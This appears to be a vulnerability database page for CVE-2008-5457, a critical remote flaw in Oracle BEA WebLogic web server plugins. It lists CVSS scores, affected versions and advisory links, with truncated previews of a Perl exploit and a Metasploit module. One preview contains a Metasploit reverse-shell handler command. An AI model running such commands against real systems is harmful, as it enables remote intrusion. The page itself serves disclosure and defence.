Published: 14/01/2009 Updated: 23/10/2012

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote malicious users to affect confidentiality, integrity, and availability via unknown vectors.

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle bea product suite 10.3
oracle bea product suite 10.0
oracle bea product suite 9.2
oracle bea product suite 8.1
oracle bea product suite 7.0
oracle bea product suite 9.1
oracle bea product suite 9.0

Oracle Weblogic IIS connector remote overflow exploit that relates to JSESSIONID ...

#!/usr/bin/perl # No point in keeping this private anymore! # # k`sOSe - 02/16/2009 - CVE-2008-5457 # Tested on w2k sp4 and w2k3 R2 sp2 (no NX) # # cohelet framework-32 # /msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=1010101 LPORT=80 E # [*] Please wait while we load the module tree # [*] Handler binding to L ...

## # $Id: bea_weblogic_jsessionidrb 9670 2010-07-03 03:19:07Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...

NVD-CWE-noinfo http://secunia.com/advisories/33526 http://www.securitytracker.com/id?1021571 http://www.securityfocus.com/bid/33177 http://www.vupen.com/english/advisories/2009/0115 http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html https://nvd.nist.gov https://packetstormsecurity.com/files/76269/Oracle-WebLogic-IIS-Connector-Overflow.html https://www.exploit-db.com/exploits/8336/

CVE-2008-5457

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect